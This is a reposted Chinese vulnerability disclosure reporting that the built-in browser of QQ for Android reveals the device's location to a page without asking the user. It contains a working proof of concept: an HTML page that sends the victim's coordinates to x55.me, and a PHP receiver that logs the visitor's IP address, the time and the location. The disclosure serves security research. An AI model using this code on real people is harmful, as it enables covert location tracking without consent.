1. 云栖社区>
  2. PHP教程>
  3. 正文

腾讯QQ安卓版内置浏览器未授权获取设备地理信息

作者:用户 来源:互联网 时间:2017-12-01 18:46:01

浏览器用户信息腾讯QQ受害者

腾讯QQ安卓版内置浏览器未授权获取设备地理信息 - 摘要: 本文讲的是腾讯QQ安卓版内置浏览器未授权获取设备地理信息, 用户通过腾讯QQ安卓版内置浏览器访问特定页面可在未经用户授权的情况下悄然无息的获取设备地理信息 测试环境: 安卓4.4.2 腾讯QQ V4.7.0.2155 给受害者发送测试地址:http://x55.me/geo.htm 当受害者通过

用户通过腾讯QQ安卓版内置浏览器访问特定页面可在未经用户授权的情况下悄然无息的获取设备地理信息

测试环境: 安卓4.4.2 腾讯QQ V4.7.0.2155

给受害者发送测试地址:http://x55.me/geo.htm 当受害者通过安卓版腾讯QQ内置浏览器打开该页面时可悄然无息的获取受害者的经纬度。

geo.htm相关代码:

<!DOCTYPE html>
<html>
<body>
<script>
getLocation();
var x=document.getElementById("demo");
function getLocation()
{
if (navigator.geolocation)
{
navigator.geolocation.getCurrentPosition(showPosition);
}
else{x.innerHTML="Geolocation is not supported by this browser.";}
}
function showPosition(position)
{
img=new Image();img.src="http://x55.me/geo.php?get="+position.coords.latitude+","+position.coords.longitude;
}
</script>
</body>
</html>

再写一个简易的接收端geo.php

<?php

file_put_contents("test.txt"," IP:".$_SERVER["REMOTE_ADDR"], FILE_APPEND);

file_put_contents("test.txt"," Time:".date("Y.m.d H:i:s"),FILE_APPEND);

file_put_contents("test.txt"," geo:".$_GET["get"]."/r/n",FILE_APPEND);


?>

附:同类浏览器如安卓自带的浏览器,chrome均会询问用户是否要对访问地理位置的行为进行授权,如下图:

[1] [2] [3]  下一页

以上是云栖社区小编为您精心准备的的内容,在云栖社区的博客、问答、公众号、人物、课程等栏目也有的相关内容,欢迎继续使用右上角搜索按钮进行搜索浏览器 , 用户 , 信息 , 腾讯QQ 受害者 ,以便于您获取更多的相关知识。

弹性可伸缩的计算服务,助您降低 IT 成本,提升运维效率

40+云计算产品,6个月免费体验

稳定可靠、可弹性伸缩的在线数据库服务,全球最受欢迎的开源数据库之一

云服务器9.9元/月,大学必备